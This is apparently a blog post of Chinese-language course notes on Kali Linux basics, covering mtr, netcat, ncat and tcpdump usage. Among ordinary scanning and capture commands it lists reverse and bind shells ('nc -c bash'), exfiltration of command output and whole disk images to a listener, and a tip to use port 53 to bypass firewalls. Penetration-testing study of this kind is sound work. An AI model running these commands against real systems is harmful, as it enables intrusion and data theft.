課程地址:Kali实战-基本工具
1.mtr <ip> 追蹤路由狀況
2.nc
nc -nv <ip> <port> #不解析 dns 直接連,查 banner、做 telnet 功用
nc -nvlp <port> #偵聽端口
nc -nz <ip> 1-65535 #掃描 TCP port
nc -nzu <ip> 1-65535 #掃描 UDP port
遠端電子取證:
本機:nc -nvlp <port>
目標主機:<command> | nc -nv <ip> <port> ,即可將目標主機之指令輸出內容傳遞給本機,若如使用 ps 等指令會不停輸出結果,則於後方加入 -q 1
傳檔案:
本機:nc -nvlp <port> > <file>
目標主機:nc -nv <ip> <port> < <file> -q 1
傳目錄:
本機:tar -cvf - <folder>/ | nc -nvlp <port>
目標主機:nc -nv <ip> <port> | tar -xvf -
影音串流:
傳送方:cat 1.mp4 | nc -nvlp <port>
接收方:nc -nv <ip> <port> | mplayer -vo x11 -cache 3000 -
遠端複製硬碟:
本機:nc -nvlp <port> | dd of=/dev/sda
目標主機:dd if=/dev/sda | nc -nv <ip> <port> -q 1
遠端控制:
(1)正向:
目標主機:nc -nvlp <port> -c bash 或 cmd
主機:nc -nv <ip> <port>ssl
(反向):
目標主機:nc -nv <ip> <port> -c bash 或 cmd
主機:nc -nvlp <port> #建議設 53 或其他常用的固定 port,以 bypass 目標主機的邊界防火牆
補充資料:Linux nc (netcat) 详解
3.ncat
彌補 nc 傳輸無加密、無身份驗證、肉雞開 port 後無法自動關閉的缺陷
目標主機:ncat -c bash --allow <ip> -nvl <port> --ssl
本機:ncat -nv <ip> <port> --ssl
4.tcpdump
預設狀況下只抓每個封包的前 68 個字節
tcpdump -i eth0 -s 0 -w <file> #-s 0 代表抓封包有多大抓多大
tcpdump -r <file> #讀取封包
tcpdump -A -r <file> #以 ASCII 讀封包內容
tcpdump -X -r #以 16 進制讀取封包內容
tcpdump -i eth0 port <port> #抓特定 port
tcpdump -n #不做 dns 解析
tcpdump -n -r <file> | awk '{print $3}' | sort -u #只顯示第三列的內容,且去除重複內容
tcpdump -n src/dst host <ip> port <port> -r <file> #只顯示來源/目標是該 ip 的特定 port 內容
補充資料:tcpdump使用技巧
5.過程紀錄工具
(1)dradis
(2)keepnote
(3)truecrypt(參考:目录加密)
沒有留言:
張貼留言